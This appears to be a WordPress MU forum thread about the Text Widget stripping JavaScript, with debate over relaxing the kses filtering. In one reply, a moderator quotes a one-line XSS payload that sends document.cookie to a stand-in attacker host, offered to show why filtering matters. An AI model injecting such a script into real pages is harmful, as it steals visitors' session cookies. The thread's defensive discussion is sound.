Text Widget in WPMU 1.5 (20 posts)

  1. hyperdry
    Member
    Posted 15 years ago #

    hi all,

    i am having problems with the Text Widget. It works fine for a text but when i insert a code it does not appear on the front end. when i check out the text widget, the code was not saved.

    is this a bug or have i done something dumb?

    thanks

  2. tdjcbe
    Member
    Posted 15 years ago #

    How about some specifics, links, copy of the code you're trying to add in, etc?

  3. andrea_r
    Moderator
    Posted 15 years ago #

    If the code you're placing in a text widget has *any* javascript in it - like a webring code, Amazon stuff etc... - it WILL get stripped out as a security measure.

    Best bet is to look for a widget that handles the code you're trying to paste in, or build your own widget to handle it.

  4. hyperdry
    Member
    Posted 15 years ago #

    thanks, your replies are very much appreciated.

    andrea_r, yes the code i wanted to place is a javascript from entrecard. do u know any widget that allows me to paste codes?

    cheers!

  5. andrea_r
    Moderator
    Posted 15 years ago #

    No, there's no widget that allows you to paste in codes. you'll have to find an entrecard widget or make one.

    MU will strip out any and all javascript unless you do.

  6. demonicume
    Member
    Posted 15 years ago #

    there are a couple of ways to do this. here are 2 that i've tried.

    Thainy's hack

    Someone coded an unfiltered widget

    you could also use the unfiltered mu plugin which i can't seem to find right now.

  7. tdjcbe
    Member
    Posted 15 years ago #

    I believe this is what you're thinking of:

    http://wpmututorials.com/news/unfiltered-html-for-mu/

  8. demonicume
    Member
    Posted 15 years ago #

    ahh, the power of google! From the site
    Entrecard Me!
    Vladimir on December 5th, 2007

    Entrecard Me! will allow you to easily use Entrecard widget on your Wordpress Blog.

  9. mark-k
    Member
    Posted 15 years ago #

    Is it possible to relax the kses to handle most of the real life need for JS and flash?

    I might be really wrong here, but isn't the main security threat against which the filtering is done cookie theft, and if JS is loaded from a different domain it is the browser's responsibility not to give access to the cookies? Therefore there should not be any possible security breach if kses will allow the inclusion of JS with the <script src="otherdomain.com/file.js" /> syntax?

  10. donncha
    Key Master
    Posted 15 years ago #

    mark-k what about the following snippet:
    <script>var img=new Image();img.src='http://badguy.tld/cookiecollect.php?c=' + document.cookie;</script>

    From http://www.ush.it/2006/07/28/httponly-cookies-and-mozilla-firefox/

    You could possibly filter out document.cookie but that's not a good way to go because someone's going to figure out a way around your code if you only blacklist, instead of the whitelisting we do now.

  11. mark-k
    Member
    Posted 15 years ago #

    Donncha, I should have spelled out that no javascript protocol and embedded scripting should be allowed, just relax the rules for the self enclosed script tags.

    I think that statistics services ask you to embed a JS in this way in order to provide richer data. I don't really have any strong knowledge for how many services this will be enough.

    The more interesting part of my proposal is to implement the same for flash. If a flash file is loaded from another domain, what harm can it do?

  12. lunabyte
    Member
    Posted 15 years ago #

    "If a flash file is loaded from another domain, what harm can it do?"

    Seriously?

    As much or more harm than javascript, and javascript can neuter your site pretty quickly.

  13. mark-k
    Member
    Posted 15 years ago #

    Lunabyte, are you suggesting that all the plugins which embed youtube are not secure because they embed flash?

    In any case, I guess that you will agree that there are sites from which it is safe to load flash. It might be easier to maintain a white list of such sites than writing a plugin/widgets for all of them.

  14. lunabyte
    Member
    Posted 15 years ago #

    That's not what I'm saying.

    What I am saying however is that once a user has permission to use embed, object, script, etc. tags without restraint, then you lose control of what is used as a source of those tags.

    There will always be a user who whines a tune about "well you let this site, and this site is more popular but it's blocked". Etc., so on, and so forth.

    Not to mention that once your site gets hacked, you realize it came from allowing these codes, and then you take it away, end users get rather upset.

    Easiest method is to simply create a plugin. By doing so, you allow users to input the dynamic portion of the code (like the video id from youtube) in as a parameter (which should be sanitized and checked), then the plugin in turn spits out the correct code.

    That gives you the functionality, but keeps the control in your hands.

    But hey, it's your site, do whatever you want with it. That's cool, but when it gets hacked to bits one day, be prepared for a lot of "we told you so" comments. ;)
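
The plugin approach described in the post above, together with the whitelisting point from post 10, as an added example that is not part of the original thread and not WPMU or plugin code: the user supplies only an ID, it is checked against a strict pattern, and the markup comes from a fixed template. The function name render_embed, the provider table, the 11-character ID pattern and the iframe template are assumptions made for illustration.

```php
<?php
// Added example; provider table, ID pattern and template are assumptions.
// Each allowed provider has a fixed markup template. Users never supply
// markup, only the dynamic part (the video ID).
const EMBED_PROVIDERS = [
    'youtube' => [
        'id_pattern' => '/\A[A-Za-z0-9_-]{11}\z/',
        'template'   => '<iframe width="300" height="169" '
                      . 'src="https://www.youtube.com/embed/%s"></iframe>',
    ],
];

/**
 * Return embed markup for an allowlisted provider and a valid ID, or null.
 * Input that fails either check is rejected outright, never "cleaned".
 */
function render_embed(string $provider, string $id): ?string
{
    if (!array_key_exists($provider, EMBED_PROVIDERS)) {
        return null; // provider is not on the allowlist
    }
    $spec = EMBED_PROVIDERS[$provider];
    if (preg_match($spec['id_pattern'], $id) !== 1) {
        return null; // ID contains anything outside the expected alphabet/length
    }
    // The ID already matched a strict pattern; escape anyway as defence in depth.
    return sprintf($spec['template'], htmlspecialchars($id, ENT_QUOTES, 'UTF-8'));
}

// Constructed sample inputs: one valid ID, one attempt to break out of the
// attribute, one provider that is not on the allowlist.
$samples = [
    ['youtube', 'abcdefghijk'],
    ['youtube', 'x" onload="y'],
    ['otherhost', 'abcdefghijk'],
];
foreach ($samples as [$provider, $id]) {
    $html = render_embed($provider, $id);
    echo $html === null ? "rejected: $provider / $id\n" : "ok: $html\n";
}
```

Only the first sample produces markup; the other two are rejected because nothing outside the pattern or the provider table is accepted.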

  15. hyperdry
    Member
    Posted 15 years ago #

    thanks demonicume

  16. uscommonsense
    Member
    Posted 14 years ago #

    Ok, I am now running into this problem on my WpMu 2.6.3 site. On one of the blogs, EntreCard and AdSense works perfectly fine (via Text widgets). On another site, neither works (using the same theme template). Anyone care to guess why it would work on one blog and not another?

    Site where the scripts are working: http://darkness.blog-now.net/

    Site where the scripts are not working: http://chocolatekisses.blog-now.net/

  17. uscommonsense
    Member
    Posted 14 years ago #

    In the mean time, I am using the EntreCard Me! Widget as a Text Box widget. Still, a viable (and simple) work-around for scripts in the text box widget would be welcomed.

  18. andrea_r
    Moderator
    Posted 14 years ago #

    Scripts in a text box widget, just make your own:

    http://wpmututorials.com/plugins/build-your-own-widget/

  19. uscommonsense
    Member
    Posted 14 years ago #

    Thanks Andrea. I was able to create the widget. However, when I add the widget to my sidebar and click on the "edit" link, there is no field to update the text. All that is displayed is a sentence saying "There are no options for this widget."

    Here is a screen shot: http://uscommonsense.net/images/BAWscreenshot.jpg

    I reviewed the code from the download file from your link above, and I do not see what might be causing the issue. Any tips?

    Thanks again for your help. :)

  20. andrea_r
    Moderator
    Posted 14 years ago #

    Because that blank widget doesn't have those options built in. So if there's no options (which there isn't) then they won't show.

    If you need options, then you'll have to look at another one I did and get the extra lines from there.

    http://wpmututorials.com/plugins/so-easy-my-mom-can-use-it-the-image-badge-widget/

About this Topic

  • Started 15 years ago by hyperdry
  • Latest reply from andrea_r